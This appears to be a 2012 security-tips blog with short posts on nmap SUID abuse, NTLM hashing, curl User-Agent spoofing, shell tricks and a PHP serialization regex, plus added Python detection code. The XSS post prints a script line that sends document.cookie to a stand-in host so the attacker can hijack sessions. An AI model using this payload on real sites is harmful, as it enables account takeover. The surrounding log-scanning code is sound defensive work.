Tuesday, October 23, 2012

Nmap & suid

If you come across a machine or web app that has nmap with the suid bit set, then the following article will be of interest to you:

http://synfin.net/papers/nmap-suid.txt


Friday, October 19, 2012

Mount NTFS ISOs in linux

http://wiki.edseek.com/guide:mount_loopback#accessing_specific_partitions_in_the_image

watch ALL the things

So I'm waiting for a drive to clone and I like to see both the byte size AND the human-readable byte size. I know you repeat a command using "watch", duh... but two commands at once?

It's actually much simpler than it sounds. All watch does is join its arguments and pass them to 'sh -c'. So it follows that the following line must work:

watch ls -l file \; ls -lh file

and yes, it does. All you need to do is escape the command terminator ';' so that your own shell passes it through to watch as an argument (instead of ending the watch command right there); watch's 'sh -c' then treats it as the separator between the two commands.

now to watch paint dry...

Wednesday, October 17, 2012

OSX Alert Boxes

Found this in a Stack Overflow post; apparently running the following line pops up a box with the specified text:
osascript -e 'tell app "System Events" to display dialog "ZOMGLULZ"'

Monday, October 8, 2012

Actual XSS Impact

Popping up alert boxes as a PoC for XSS is cute and all, but sometimes you want to see the actual attack. The following JavaScript line makes a GET request to example.com/wut.gif with document.cookie appended to the query string. You then log into that server, read your Apache logs, and you have the cookies for that user. Replace your browser's cookies with the captured ones and, depending on the site, you could log in as them.
<script>a = new Image(); a.src = "http://example.com/wut.gif?" + document.cookie + "end"; </script>
This is an actual attacker's line; don't be stupid.
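From the defender's side, the trace that line leaves is a request whose query string carries a whole cookie jar, so it shows up in the receiving server's access log (and, if the image URL points back at the victim site, in the site's own logs). As an added example that is not part of the original post, here is a small Python scanner over constructed Apache combined-format log lines that flags requests with session-cookie names in the URL; the log lines, the cookie-name list and the function names are all assumptions of mine. Note also that cookies set with the HttpOnly flag are not exposed through document.cookie, so that line captures nothing from them.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache "combined" log format, one request per line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Cookie names whose value should never travel in a query string. Constructed,
# illustrative list; add your application's own session cookie name.
SESSION_COOKIE_NAMES = {
    "phpsessid", "jsessionid", "asp.net_sessionid", "sessionid",
    "session", "sid", "token", "auth",
}

# Constructed sample log lines (not real traffic). The second one is what the
# post's <script> line produces on the receiving server: the cookie jar glued
# onto a GET for wut.gif, "; " separators URL-encoded, and the literal "end".
SAMPLE_LOG = """\
203.0.113.5 - - [08/Oct/2012:10:01:02 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Oct/2012:10:01:09 -0400] "GET /wut.gif?PHPSESSID=3f2a9c1b7e;%20user=aliceend HTTP/1.1" 404 209 "http://victim.example/profile" "Mozilla/5.0"
203.0.113.9 - - [08/Oct/2012:10:02:30 -0400] "GET /search?q=shoes HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def cookie_names_in_query(path: str) -> list:
    """Return the session-cookie names that appear as name=value pairs in the
    request's query string. Pairs are split on both "&" (query syntax) and ";"
    (Cookie-header syntax) because an exfiltrated document.cookie keeps the latter."""
    query = unquote(urlsplit(path).query)
    names = []
    for pair in re.split(r"[;&]", query):
        name, sep, _ = pair.strip().partition("=")
        if sep and name.lower() in SESSION_COOKIE_NAMES:
            names.append(name)
    return names


def find_exfil_candidates(log_text: str) -> list:
    """Scan log lines and report requests that carry session cookies in the URL."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        names = cookie_names_in_query(rec["path"])
        if names:
            hits.append({"ip": rec["ip"], "path": rec["path"],
                         "cookie_names": names, "referer": rec["referer"]})
    return hits


if __name__ == "__main__":
    for hit in find_exfil_candidates(SAMPLE_LOG):
        print(hit)
```

The Referer of a flagged request tells you which page on the victim site carried the injected script, which is usually the first thing you want when triaging a report like this.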

Generate NTLM hashes via command line

Turns out the NTLM hashing algorithm is super simple. It just takes the string you give it, converts it to UTF-16LE and then outputs the MD4 of that. You can generate your own fairly simply at the command line:

iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4
What this does is use the fairly popular Unix utility "iconv": -f is the "from" encoding, which in this case is just plain ASCII, and -t sets the "to" encoding. It reads the string from printf (via process substitution) and pipes the result to openssl for the digest. The output is the NT hash of the string (or password, if you want to look at it like that) "lolwut":

$iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4
dcc1ed89d1d080ef47dccf3e59a50d45
Create a function and place it in .bashrc:
ntlm_hash () {
    # printf '%s' so a password containing '%' is not treated as a format string;
    # a pipe instead of <( ) so this also works in shells without process substitution;
    # UTF-8 as the source encoding so non-ASCII passwords do not make iconv bail out
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | openssl dgst -md4
}
Now just type "ntlm_hash lolwut" to get the same result.

Stealth cURL

I use curl all the time, almost every day. Unfortunately curl thinks it's a good idea to send its own User-Agent string when grabbing content from sites. This is a problem because devs sometimes code exceptions for different browsers, so the page you get back for Internet Explorer is different from the one you get for Firefox. Luckily, the curl devs included the ability to change your User-Agent string to whatever you want.

Normally curl's User-Agent string is this (curl from my MacBook):
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5

That is grabbed directly from the header that is sent to the server (captured using netcat). As you can see, it's fairly obvious that the person is on a Mac and using curl. To change this user agent so it appears as if Firefox is grabbing the page, we use the -A option. First we grab a valid user agent string from http://www.useragentstring.com/; in this case I'm going to use the latest Firefox one. The command line is as follows:

curl -A 'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2' example.com
Now if you look at your logs, you will see the new User-Agent string.

Note:
curl supports config files via -K, so you can place the -A option in a file along with whatever else you want to use and reference that config file; a nice example is in the man page.

Wednesday, October 3, 2012

Regex for PHP serialized data

This is the regex string to use when searching through a document for serialized data.

/^(i|s|a|o|d)(.*);/si

I got it from here: http://regex-test.com/library/entry/check_if_serialized/16
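The pattern above is deliberately loose: it accepts anything starting with one of five letters and ending in a semicolon, so it matches plain words like "identity;" and misses b: (booleans) and N; (null). As an added example that is not from the post or the linked site, here it is in Python next to a stricter anchored pattern of my own that requires the ":" and terminator each PHP type actually uses, plus a check that a serialized string's declared length matches its content (PHP counts bytes, not characters). Knowing exactly where serialized data is accepted matters because that is where unserialize() gets fed untrusted input. The sample document and function names are constructed.

```python
import re

# The post's pattern, /^(i|s|a|o|d)(.*);/si, with the same flags in Python terms:
# re.S so "." spans newlines, re.I so "o" also matches "O:" objects.
LOOSE = re.compile(r"^(i|s|a|o|d)(.*);", re.S | re.I)

# Stricter, fully anchored heuristic (my own, not from the post): one serialized
# value per string, covering the type prefixes the loose pattern misses.
STRICT = re.compile(
    r"""^(?:
          N;                                            # null
        | b:[01];                                       # bool
        | i:-?\d+;                                      # int
        | d:-?(?:\d+(?:\.\d+)?|INF|NAN)(?:E[+-]?\d+)?;  # float
        | s:\d+:".*";                                   # string, length-prefixed
        | a:\d+:\{.*\}                                  # array
        | O:\d+:"[^"]+":\d+:\{.*\}                      # object
    )$""",
    re.S | re.X,
)

STRING_RE = re.compile(r'^s:(\d+):"(.*)";$', re.S)


def looks_serialized(value: str, strict: bool = True) -> bool:
    """True if value looks like PHP serialize() output under the chosen pattern."""
    return bool((STRICT if strict else LOOSE).match(value))


def string_length_consistent(value: str) -> bool:
    """For s:N:"...";, check that N equals the UTF-8 byte length of the content."""
    m = STRING_RE.match(value)
    if not m:
        return False
    return int(m.group(1)) == len(m.group(2).encode("utf-8"))


def find_candidates(document: str, strict: bool = True) -> list:
    """Scan a document line by line and return the lines that look serialized."""
    return [line.strip() for line in document.splitlines()
            if looks_serialized(line.strip(), strict)]


# Constructed sample document: real serialize() output mixed with plain text.
SAMPLE = """\
identity;
i:42;
s:5:"hello";
b:1;
N;
a:2:{i:0;s:1:"a";i:1;s:1:"b";}
O:8:"stdClass":1:{s:3:"foo";s:3:"bar";}
this is a sentence;
"""


if __name__ == "__main__":
    print("loose :", find_candidates(SAMPLE, strict=False))
    print("strict:", find_candidates(SAMPLE))
```

Both patterns are still heuristics; nested arrays and objects are only recognised by their outer braces, so a mismatched inner structure will pass. For a definitive answer, hand the candidate to an actual PHP parser rather than trusting a regex.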